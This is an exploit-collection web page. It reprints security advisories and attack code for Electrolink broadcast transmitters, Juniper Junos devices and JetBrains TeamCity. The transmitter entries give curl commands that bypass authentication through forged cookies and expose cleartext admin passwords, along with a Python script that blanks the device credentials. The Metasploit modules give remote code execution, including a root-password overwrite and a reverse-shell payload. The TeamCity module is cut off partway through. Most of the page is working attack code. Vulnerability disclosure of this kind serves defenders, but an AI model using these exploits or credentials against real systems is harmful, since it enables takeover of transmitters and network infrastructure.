Latest exploits :: CodePwn

<pre><code> Electrolink FM/DAB/TV Transmitter SuperAdmin Hidden Functionality Vendor: Electrolink s.r.l. Product web page: https://www.electrolink.com Affected version: 10W, 100W, 250W, Compact DAB Transmitter 500W, 1kW, 2kW Medium DAB Transmitter 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter 100W, 500W, 1kW, 2kW Compact FM Transmitter 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter 15W - 40kW Digital FM Transmitter BI, BIII VHF TV Transmitter 10W - 5kW UHF TV Transmitter Web version: 01.09, 01.08, 01.07 Display version: 1.4, 1.2 Control unit version: 01.06, 01.04, 01.03 Firmware version: 2.1 Summary: Since 1990 Electrolink has been dealing with design and manufacturing of advanced technologies for radio and television broadcasting. The most comprehensive products range includes: FM Transmitters, DAB Transmitters, TV Transmitters for analogue and digital multistandard operation, Bandpass Filters (FM, DAB, ATV, DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial switches, Manual patch panels, RF power meters, Rigid line and accessories. A professional solution that meets broadcasters needs from small community television or radio to big government networks. Compact DAB Transmitters 10W, 100W and 250W models with 3.5" touch-screen display and in-built state of the art DAB modulator, EDI input and GPS receiver. All transmitters are equipped with a state-of-the art DAB modulator with excellent performances, self-protected and self-controlled amplifiers ensure trouble-free non-stop operation. 100W, 500W, 1kW and 2kW power range available on compact 2U and 3U 19" frame. Built-in stereo coder, touch screen display and efficient low noise air cooling system. Available models: 3kW, 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters with fully broadband solid state amplifiers and an efficient low-noise air cooling system. FM digital modulator with excellent specifications, built-in stereo and RDS coder. Digital deviation limiter together with ASI and SDI inputs are available. These transmitters are ready for ISOFREQUENCY networks. Available for VHF BI and VHF BIII operation with robust desing and user-friendly local and remote control. Multi-standard UHF TV transmitters from 10W up to 5kW with efficient low noise air cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC and ISDB-Tb available. Desc: The device allows an unauthenticated attacker to bypass authentication and modify the Cookie to reveal hidden pages that allows more critical operations to the transmitter. Tested on: Mbedthis-Appweb/12.5.0 Mbedthis-Appweb/12.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research & Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5794 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5794.php 30.06.2023 -- C:\>curl -s "http://192.168.150.77:8888/home.htm" | findstr /spina:d "admin" 33:<a class="linkm admin" href="/setting.htm">Setting & Status</a> 34:<a class="linkm admin" href="/lan.htm">Setting lan</a> 35:<a class="linkm admin" href="/snmp.htm">Setting snmp</a> 36:<a class="linkm admin" href="/mail.htm">Setting e-mail</a> 37:<a class="linkm admin" href="/login.htm">Setting login</a> 38:<a class="linkm admin superadmin" href="/admin.htm">Setting admin</a> 39:<a class="linkm admin superadmin" href="/terminal.htm">Terminal</a> ... C:\>curl -s "http://192.168.150.77:8888/admin.htm" -H "Cookie: Login=ZSL" C:\>curl -s "http://192.168.150.77:8888/terminal.htm" -H "Cookie: Login=ZSL" </code></pre>

<pre><code> Electrolink FM/DAB/TV Transmitter Vertical Privilege Escalation Vendor: Electrolink s.r.l. Product web page: https://www.electrolink.com Affected version: 10W, 100W, 250W, Compact DAB Transmitter 500W, 1kW, 2kW Medium DAB Transmitter 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter 100W, 500W, 1kW, 2kW Compact FM Transmitter 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter 15W - 40kW Digital FM Transmitter BI, BIII VHF TV Transmitter 10W - 5kW UHF TV Transmitter Web version: 01.09, 01.08, 01.07 Display version: 1.4, 1.2 Control unit version: 01.06, 01.04, 01.03 Firmware version: 2.1 Summary: Since 1990 Electrolink has been dealing with design and manufacturing of advanced technologies for radio and television broadcasting. The most comprehensive products range includes: FM Transmitters, DAB Transmitters, TV Transmitters for analogue and digital multistandard operation, Bandpass Filters (FM, DAB, ATV, DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial switches, Manual patch panels, RF power meters, Rigid line and accessories. A professional solution that meets broadcasters needs from small community television or radio to big government networks. Compact DAB Transmitters 10W, 100W and 250W models with 3.5" touch-screen display and in-built state of the art DAB modulator, EDI input and GPS receiver. All transmitters are equipped with a state-of-the art DAB modulator with excellent performances, self-protected and self-controlled amplifiers ensure trouble-free non-stop operation. 100W, 500W, 1kW and 2kW power range available on compact 2U and 3U 19" frame. Built-in stereo coder, touch screen display and efficient low noise air cooling system. Available models: 3kW, 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters with fully broadband solid state amplifiers and an efficient low-noise air cooling system. FM digital modulator with excellent specifications, built-in stereo and RDS coder. Digital deviation limiter together with ASI and SDI inputs are available. These transmitters are ready for ISOFREQUENCY networks. Available for VHF BI and VHF BIII operation with robust desing and user-friendly local and remote control. Multi-standard UHF TV transmitters from 10W up to 5kW with efficient low noise air cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC and ISDB-Tb available. Desc: The application suffers from a privilege escalation vulnerability. An attacker can escalate his privileges by poisoning the Cookie from GUEST to ADMIN to effectively become Administrator or poisoning to ZSL to become Super Administrator. Tested on: Mbedthis-Appweb/12.5.0 Mbedthis-Appweb/12.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research & Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5793 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5793.php 30.06.2023 -- C:\>curl -s "http://192.168.150.77:8888/mail.htm" -H "Cookie: Login=ADMIN" #changed Login=GUEST </code></pre>

<pre><code>#!/usr/bin/env python # # # Electrolink FM/DAB/TV Transmitter Remote Authentication Removal # # # Vendor: Electrolink s.r.l. # Product web page: https://www.electrolink.com # Affected version: 10W, 100W, 250W, Compact DAB Transmitter # 500W, 1kW, 2kW Medium DAB Transmitter # 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter # 100W, 500W, 1kW, 2kW Compact FM Transmitter # 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter # 15W - 40kW Digital FM Transmitter # BI, BIII VHF TV Transmitter # 10W - 5kW UHF TV Transmitter # Web version: 01.09, 01.08, 01.07 # Display version: 1.4, 1.2 # Control unit version: 01.06, 01.04, 01.03 # Firmware version: 2.1 # # Summary: Since 1990 Electrolink has been dealing with design and # manufacturing of advanced technologies for radio and television # broadcasting. The most comprehensive products range includes: FM # Transmitters, DAB Transmitters, TV Transmitters for analogue and # digital multistandard operation, Bandpass Filters (FM, DAB, ATV, # DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial # switches, Manual patch panels, RF power meters, Rigid line and # accessories. A professional solution that meets broadcasters needs # from small community television or radio to big government networks. # # Compact DAB Transmitters 10W, 100W and 250W models with 3.5" # touch-screen display and in-built state of the art DAB modulator, # EDI input and GPS receiver. All transmitters are equipped with a # state-of-the art DAB modulator with excellent performances, # self-protected and self-controlled amplifiers ensure trouble-free # non-stop operation. # # 100W, 500W, 1kW and 2kW power range available on compact 2U and # 3U 19" frame. Built-in stereo coder, touch screen display and # efficient low noise air cooling system. Available models: 3kW, # 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters # with fully broadband solid state amplifiers and an efficient # low-noise air cooling system. # # FM digital modulator with excellent specifications, built-in # stereo and RDS coder. Digital deviation limiter together with # ASI and SDI inputs are available. These transmitters are ready # for ISOFREQUENCY networks. # # Available for VHF BI and VHF BIII operation with robust desing # and user-friendly local and remote control. Multi-standard UHF # TV transmitters from 10W up to 5kW with efficient low noise air # cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC # and ISDB-Tb available. # # Desc: The application is vulnerable to an unauthenticated # parameter manipulation that allows an attacker to set the # credentials to blank giving her access to the admin panel. # Also vulnerable to account takeover and arbitrary password # change. # # Tested on: Mbedthis-Appweb/12.5.0 # Mbedthis-Appweb/12.0.0 # # # Vulnerability discovered by Neurogenesia # Macedonian Information Security Research & Development Laboratory # Zero Science Lab - https://www.zeroscience.mk - @zeroscience # # # Advisory ID: ZSL-2023-5792 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5792.php # # # 30.06.2023 # # import datetime import requests dt = datetime.datetime.now() dt = dt.strftime('%d.%m.%Y %H:%M:%S') nul = '' print('Starting transmitter exploit at', dt) ip = input('Enter transmitter ip: ') if 'http' not in ip: ip = 'http://' + ip ep = '/login.htm' url = ip + ep signature = {'Accept-Encoding' : 'gzip, deflate', 'Accept-Language' : 'ku-MK,en;q=0.1806', 'User-Agent' : 'Broadcastso/B.B', 'Connection' : 'keep-alive' } # ----------------- Line breaker v0.17 ----------------- postd = { 'adminuser' : nul, 'guestuser' : nul, 'adminpassword' : nul, 'guestpassword' : nul } print('Removing security control...') r = requests.post(url, data = postd, headers = signature) if r.status_code == 200: print('Done. Go and "Login".') else: print('Error') exit(-4) </code></pre>

<pre><code> Electrolink FM/DAB/TV Transmitter (Login Cookie) Authentication Bypass Vendor: Electrolink s.r.l. Product web page: https://www.electrolink.com Affected version: 10W, 100W, 250W, Compact DAB Transmitter 500W, 1kW, 2kW Medium DAB Transmitter 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter 100W, 500W, 1kW, 2kW Compact FM Transmitter 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter 15W - 40kW Digital FM Transmitter BI, BIII VHF TV Transmitter 10W - 5kW UHF TV Transmitter Web version: 01.09, 01.08, 01.07 Display version: 1.4, 1.2 Control unit version: 01.06, 01.04, 01.03 Firmware version: 2.1 Summary: Since 1990 Electrolink has been dealing with design and manufacturing of advanced technologies for radio and television broadcasting. The most comprehensive products range includes: FM Transmitters, DAB Transmitters, TV Transmitters for analogue and digital multistandard operation, Bandpass Filters (FM, DAB, ATV, DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial switches, Manual patch panels, RF power meters, Rigid line and accessories. A professional solution that meets broadcasters needs from small community television or radio to big government networks. Compact DAB Transmitters 10W, 100W and 250W models with 3.5" touch-screen display and in-built state of the art DAB modulator, EDI input and GPS receiver. All transmitters are equipped with a state-of-the art DAB modulator with excellent performances, self-protected and self-controlled amplifiers ensure trouble-free non-stop operation. 100W, 500W, 1kW and 2kW power range available on compact 2U and 3U 19" frame. Built-in stereo coder, touch screen display and efficient low noise air cooling system. Available models: 3kW, 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters with fully broadband solid state amplifiers and an efficient low-noise air cooling system. FM digital modulator with excellent specifications, built-in stereo and RDS coder. Digital deviation limiter together with ASI and SDI inputs are available. These transmitters are ready for ISOFREQUENCY networks. Available for VHF BI and VHF BIII operation with robust desing and user-friendly local and remote control. Multi-standard UHF TV transmitters from 10W up to 5kW with efficient low noise air cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC and ISDB-Tb available. Desc: The transmitter is vulnerable to an authentication bypass vulnerability affecting the Login Cookie. An attacker can set an arbitrary value except 'NO' to the Login Cookie and have full system access. Tested on: Mbedthis-Appweb/12.5.0 Mbedthis-Appweb/12.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research & Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5791 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5791.php 30.06.2023 -- C:\>curl -s "http://192.168.150.77:8888/home.htm" -H "Cookie: Login=ADMIN" </code></pre>

<pre><code> Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credentials Disclosure Vendor: Electrolink s.r.l. Product web page: https://www.electrolink.com Affected version: 10W, 100W, 250W, Compact DAB Transmitter 500W, 1kW, 2kW Medium DAB Transmitter 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter 100W, 500W, 1kW, 2kW Compact FM Transmitter 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter 15W - 40kW Digital FM Transmitter BI, BIII VHF TV Transmitter 10W - 5kW UHF TV Transmitter Web version: 01.09, 01.08, 01.07 Display version: 1.4, 1.2 Control unit version: 01.06, 01.04, 01.03 Firmware version: 2.1 Summary: Since 1990 Electrolink has been dealing with design and manufacturing of advanced technologies for radio and television broadcasting. The most comprehensive products range includes: FM Transmitters, DAB Transmitters, TV Transmitters for analogue and digital multistandard operation, Bandpass Filters (FM, DAB, ATV, DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial switches, Manual patch panels, RF power meters, Rigid line and accessories. A professional solution that meets broadcasters needs from small community television or radio to big government networks. Compact DAB Transmitters 10W, 100W and 250W models with 3.5" touch-screen display and in-built state of the art DAB modulator, EDI input and GPS receiver. All transmitters are equipped with a state-of-the art DAB modulator with excellent performances, self-protected and self-controlled amplifiers ensure trouble-free non-stop operation. 100W, 500W, 1kW and 2kW power range available on compact 2U and 3U 19" frame. Built-in stereo coder, touch screen display and efficient low noise air cooling system. Available models: 3kW, 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters with fully broadband solid state amplifiers and an efficient low-noise air cooling system. FM digital modulator with excellent specifications, built-in stereo and RDS coder. Digital deviation limiter together with ASI and SDI inputs are available. These transmitters are ready for ISOFREQUENCY networks. Available for VHF BI and VHF BIII operation with robust desing and user-friendly local and remote control. Multi-standard UHF TV transmitters from 10W up to 5kW with efficient low noise air cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC and ISDB-Tb available. Desc: The device is vulnerable to a disclosure of clear-text credentials in controlloLogin.js that can allow security bypass and system access. Tested on: Mbedthis-Appweb/12.5.0 Mbedthis-Appweb/12.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research & Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5790 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5790.php 30.06.2023 -- C:\>curl -s "http://192.168.150.77:8888/controlloLogin.js" function verifica() { var user = document.getElementById('user').value; var password = document.getElementById('password').value; //alert(user); if(user=='admin' && password=='cozzir'){ SetCookie('Login','OK',exp); window.location.replace("FrameSetCore.html"); }else{ SetCookie('Login','NO',exp); window.location.replace("login.html"); } } </code></pre>

<pre><code> Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) Credentials Disclosure Vendor: Electrolink s.r.l. Product web page: https://www.electrolink.com Affected version: 10W, 100W, 250W, Compact DAB Transmitter 500W, 1kW, 2kW Medium DAB Transmitter 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter 100W, 500W, 1kW, 2kW Compact FM Transmitter 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter 15W - 40kW Digital FM Transmitter BI, BIII VHF TV Transmitter 10W - 5kW UHF TV Transmitter Web version: 01.09, 01.08, 01.07 Display version: 1.4, 1.2 Control unit version: 01.06, 01.04, 01.03 Firmware version: 2.1 Summary: Since 1990 Electrolink has been dealing with design and manufacturing of advanced technologies for radio and television broadcasting. The most comprehensive products range includes: FM Transmitters, DAB Transmitters, TV Transmitters for analogue and digital multistandard operation, Bandpass Filters (FM, DAB, ATV, DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial switches, Manual patch panels, RF power meters, Rigid line and accessories. A professional solution that meets broadcasters needs from small community television or radio to big government networks. Compact DAB Transmitters 10W, 100W and 250W models with 3.5" touch-screen display and in-built state of the art DAB modulator, EDI input and GPS receiver. All transmitters are equipped with a state-of-the art DAB modulator with excellent performances, self-protected and self-controlled amplifiers ensure trouble-free non-stop operation. 100W, 500W, 1kW and 2kW power range available on compact 2U and 3U 19" frame. Built-in stereo coder, touch screen display and efficient low noise air cooling system. Available models: 3kW, 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters with fully broadband solid state amplifiers and an efficient low-noise air cooling system. FM digital modulator with excellent specifications, built-in stereo and RDS coder. Digital deviation limiter together with ASI and SDI inputs are available. These transmitters are ready for ISOFREQUENCY networks. Available for VHF BI and VHF BIII operation with robust desing and user-friendly local and remote control. Multi-standard UHF TV transmitters from 10W up to 5kW with efficient low noise air cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC and ISDB-Tb available. Desc: The device is vulnerable to a disclosure of clear-text credentials in login.htm and mail.htm that can allow security bypass and system access. Tested on: Mbedthis-Appweb/12.5.0 Mbedthis-Appweb/12.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research & Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5789 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5789.php 30.06.2023 -- C:\>curl -s "http://192.168.150.77:8888/login.htm" | findstr /spina:d "passw" 55:<td class=cd31>Admin password</td> 56:<td class=cd32><input type=password name=adminpassword value="cozzir" tabindex=2 style="width: 95%" maxlength="30"/></td> 63:<td class=cd31>Guest password</td> 64:<td class=cd32><input type=password name=guestpassword value="guest" tabindex=4 style="width: 95%" maxlength="30"/></td> C:\>curl -s http://192.168.150.77:8888/mail.htm | findstr /spina:d "passw" 93:<td class=cd31>Server password</td> 94:<td class=cd32><input type=password name=password value="t00tw00t" tabindex=4 style="width: 95%" maxlength="40"/></td> </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'unix_crypt' require 'net/ssh' require 'net/ssh/command_stream' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::Remote::SSH prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Junos OS PHPRC Environment Variable Manipulation RCE', 'Description' => %q{ This module exploits a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls and EX switches. The affected Juniper devices run FreeBSD and every FreeBSD process can access their stdin by opening /dev/fd/0. The exploit also makes use of two useful PHP features. The first being 'auto_prepend_file' which causes the provided file to be added using the 'require' function. The second PHP function is 'allow_url_include' which allows the use of URL-aware fopen wrappers. By enabling allow_url_include, the exploit can use any protocol wrapper with auto_prepend_file. The module then uses data:// to provide a file inline which includes the base64 encoded PHP payload. By default this exploit returns a session confined to a FreeBSD jail with limited functionality. There is a datastore option 'JAIL_BREAK', that when set to true, will steal the necessary tokens from a user authenticated to the J-Web application, in order to overwrite the the root password hash. If there is no user authenticated to the J-Web application this method will not work. The module then authenticates with the new root password over SSH and then rewrites the original root password hash to /etc/master.passwd. }, 'Author' => [ 'Jacob Baines', # Analysis 'Ron Bowes', # Jail break technique + Target setup instructions 'jheysel-r7' # Msf module ], 'References' => [ [ 'URL', 'https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/'], [ 'URL', 'https://vulncheck.com/blog/juniper-cve-2023-36845'], [ 'URL', 'https://supportportal.juniper.net/s/article/2023-08-Out-of-Cycle-Security-Bulletin-Junos-OS-SRX-Series-and-EX-Series-Multiple-vulnerabilities-in-J-Web-can-be-combined-to-allow-a-preAuth-Remote-Code-Execution?language=en_US'], [ 'CVE', '2023-36845'] ], 'License' => MSF_LICENSE, 'Platform' => %w[php unix], 'Privileged' => false, 'Arch' => [ARCH_PHP, ARCH_CMD], 'Targets' => [ [ 'PHP In-Memory', { 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Type' => :php_memory, 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp', 'RPORT' => 80 } }, ], [ 'Interactive SSH with jail break', { 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Type' => :nix_stream, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact', 'WfsDelay' => 30 }, 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find' } } } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => '2023-08-17', 'Notes' => { 'Stability' => [ CRASH_SAFE, ], 'SideEffects' => [ CONFIG_CHANGES ], 'Reliability' => [ REPEATABLE_SESSION, ] } ) ) register_options([ OptString.new('TMP_ROOT_PASSWORD', [ true, 'If target is set to "Interactive SSH with jail break", the root user\'s password will be temporarily changed to this password', rand_text_alphanumeric(24)]), OptPort.new('SSH_PORT', [true, 'SSH port of Junos Target', 22]), OptInt.new('SSH_TIMEOUT', [ true, 'The maximum acceptable amount of time to negotiate a SSH session', 30]) ]) end def check non_existent_file = rand_text_alphanumeric(8..16) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'method' => 'POST', 'ctype' => 'application/x-www-form-urlencoded', 'data' => "LD_PRELOAD=/tmp/#{non_existent_file}" ) return CheckCode::Appears('Environment variable manipulation succeeded indicating this target is vulnerable.') if res && res.body.include?("Cannot open \"/tmp/#{non_existent_file}\"") CheckCode::Safe('Environment variable manipulation failed indicating this target is not vulnerable.') end def send_php_exploit(phprc, file_contents) post_data = "allow_url_include=1\n" post_data << "auto_prepend_file=\"data://text/plain;base64,#{Rex::Text.encode_base64(file_contents)}\"" send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'method' => 'POST', 'data' => post_data, 'ctype' => 'application/x-www-form-urlencoded', 'vars_get' => { 'PHPRC' => phprc } ) end def get_php_session_id get_var_sess = "<?php print_r(scandir('/var/sess'));?>" res = send_php_exploit('/dev/fd/0', get_var_sess) fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200 php_session_id = res.body.scan(/\[\d+\] => sess_(.*)/).flatten[0] fail_with(Failure::UnexpectedReply, "Failed to retrieve a PHP Session ID. There might not be a user logged in at the moment which would cause this to fail.\n Try setting JAIL_BREAK to false to in order to get a session as the 'nobody' user. Or try again when a there is a user authenticated to the J-Web application.") unless php_session_id print_status("Found PHPSESSID: #{php_session_id}.") php_session_id end def get_csrf_token(php_session_id) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'diagnose'), 'method' => 'GET', 'headers' => { 'Cookie' => "PHPSESSID=#{php_session_id}" }, 'vars_get' => { 'm[]' => 'pinghost' } ) fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200 csrf_token = res.get_html_document.xpath("//input[@type='hidden' and @name='csrf_token']/@value").text fail_with(Failure::UnexpectedReply, 'Unable to retrieve a csrf token') unless csrf_token print_status("Found csrf token: #{csrf_token}.") csrf_token end def get_encrypted_root_password(php_session_id, csrf_token) post_data = "rs=get_cli_data&rsargs[]=getQuery&csrf_token=#{csrf_token}&key=1" res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'jsdm', 'ajax', 'cli-editor.php'), 'method' => 'POST', 'data' => post_data, 'ctype' => 'application/x-www-form-urlencoded', 'headers' => { 'Cookie' => "PHPSESSID=#{php_session_id}" } ) fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200 # The body of the above request is formatted like so: ## Last changed: 2023-09-25 13:00:49 UTC # version 20200609.165031.6_builder.r1115480; # system { # host-name JUNOS; # root-authentication { # encrypted-password "$6$yMwZY.o0$WwCZgzN7FTDfhSvkum0y9ry/nu4yWOQcgW.JJz0vJapf5P6XHoCsigsz94oEKSPO5efKFP/JhhN3/FCKvB0Hp."; # } # login { # user admin { # uid 2000; # class super-user; # authentication { # encrypted-password "$6$65gs/MrK$DNpVWfIocQ.rG/ThjZXjRI/yha/lf1UImNKivq.T1K4yLW60PWFrcQakoP6mwHT9Cr3xQZZfomKSTRXWl2aWj1"; # } # } fail_with(Failure::UnexpectedReply, 'ssh root-login is not permitted on the device thus the module will not be able to establish a session or restore the original root password.') unless res.body.scan(/"ssh\s+\{\n\s+root-login\s+allow;"/) # Multiple passwords are displayed in the output, ensure we grab the encrypted-password that belongs to the # root-authentication configuration with the following regex: og_encrypted_root_pass = res.body.scan(/root-authentication\s+\{\n\s+encrypted-password\s+"(.+)"/).flatten[0] fail_with(Failure::UnexpectedReply, 'Unable to retrieve the encrypted root password from the response') unless og_encrypted_root_pass print_status("Original encrypted root password: #{og_encrypted_root_pass}") og_encrypted_root_pass end def set_root_password(php_session_id, csrf_token, password_hash) post_data = "&current-path=/system/root-authentication/&csrf_token=#{csrf_token}&key=1&JTK-FIELD-encrypted-password=#{password_hash}" res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'editor', 'edit', 'configuration', 'system', 'root-authentication'), 'method' => 'POST', 'data' => post_data, 'ctype' => 'application/x-www-form-urlencoded', 'headers' => { 'Cookie' => "PHPSESSID=#{php_session_id}" }, 'vars_get' => { 'action' => 'commit' } ) fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200 unless res.get_html_document.xpath("//body/div[@class='commit-status' and @id='systest-commit-status-div']").text == 'Success' fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") end print_status("Successfully changed the root user's password ") end def ssh_login ssh_opts = ssh_client_defaults.merge({ port: datastore['SSH_PORT'], auth_methods: ['password'], password: datastore['TMP_ROOT_PASSWORD'] }) begin ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do Net::SSH.start(rhost, 'root', ssh_opts) end rescue Net::SSH::Exception => e vprint_error("#{e.class}: #{e.message}") return nil end if ssh Net::SSH::CommandStream.new(ssh) end end def exploit case target['Type'] when :nix_stream print_status("Attempting to break out of FreeBSD jail by changing the root user's password, establishing an SSH session and then rewriting the original root user's password hash to /etc/master.passwd.") print_warning("This requires a user is authenticated to the J-Web application in order to steal a session token, also 'ssh root-login' is set to 'allow' on the device") php_session_id = get_php_session_id csrf_token = get_csrf_token(php_session_id) @og_encrypted_root_pass = get_encrypted_root_password(php_session_id, csrf_token) tmp_password_hash = UnixCrypt::SHA512.build(datastore['TMP_ROOT_PASSWORD']) print_status "Temporary root password Hash: #{tmp_password_hash}" set_root_password(php_session_id, csrf_token, tmp_password_hash) if (ssh = ssh_login) print_good('Logged in as root') handler(ssh.lsock) end set_root_password(php_session_id, csrf_token, @og_encrypted_root_pass) when :php_memory send_php_exploit('/dev/fd/0', payload.encoded) else fail_with(Failure::BadConfig, 'Please select a valid target.') end end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Retry prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => 'JetBrains TeamCity Unauthenticated Remote Code Execution', 'Description' => %q{ This module exploits an authentication bypass vulnerability to achieve unauthenticated remote code execution against a vulnerable JetBrains TeamCity server. All versions of TeamCity prior to version 2023.05.4 are vulnerable to this issue. The vulnerability was originally discovered by SonarSource. }, 'License' => MSF_LICENSE, 'Author' => [ 'sfewer-r7', # MSF Exploit & Rapid7 Analysis ], 'References' => [ ['CVE', '2023-42793'], ['URL', 'https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis'], ['URL', 'https://blog.jetbrains.com/teamcity/2023/09/critical-security-issue-affecting-teamcity-on-premises-update-to-2023-05-4-now/'] ], 'DisclosureDate' => '2023-09-19', 'Platform' => %w[win linux], 'Arch' => [ARCH_CMD], 'Payload' => { 'Space' => 1024 }, 'Privileged' => false, # TeamCity may be installed to run as local system/root, or it may be run as a custom user account. 'Targets' => [ [ 'Windows', { 'Platform' => 'win' } ], [ 'Linux', { 'Platform' => 'linux' } ] ], 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options( [ # By default TeamCity listens for HTTP requests on TCP port 8111. Opt::RPORT(8111), # The first user created during installation is an administrator account, so the ID will be 1. OptInt.new('TEAMCITY_ADMIN_ID', [true, 'The ID of an administrator account to authenticate as', 1]), # We modify a configuration file, we need to wait for the changes to be picked up. These options govern how we wait. OptInt.new('TEAMCITY_CHANGE_TIMEOUT', [true, 'The timeout to wait for the changes to be applied', 30]) ] ) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => '/login.html' ) return CheckCode::Unknown('Connection failed') unless res # We expect a TeamCity server to respond with either a "TeamCity-Node-Id" header value or a cookie named "TCSESSIONID". # In the responses HTML body will be a string containing the release name and build version. if (res.headers.key?('TeamCity-Node-Id') || res.get_cookies.include?('TCSESSIONID')) && (res.body =~ /(\d+\.\d+\.\d+) $build (\d+)$/) detected = "JetBrains TeamCity #{::Regexp.last_match(1)} (build #{::Regexp.last_match(2)}) detected." # The vulnerability was patched in release 2023.05.4 (build 129421) so anything before this build is vulnerable. if ::Regexp.last_match(2).to_i < 129421 return CheckCode::Vulnerable(detected) end return CheckCode::Safe(detected) end CheckCode::Unknown end def exploit token_uri = "/app/rest/users/id:#{datastore['TEAMCITY_ADMIN_ID']}/tokens/RPC2" res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(token_uri) ) # A token named 'RPC2' may already exist if this system has been exploited before and previous exploitation # did not delete teh token after use. We detect that here, delete the token (as we dont know its value) if required # and then proceed to create a new token for our use. if res && (res.code == 400) && res.body.include?('Token already exists') print_status('Token already exists, 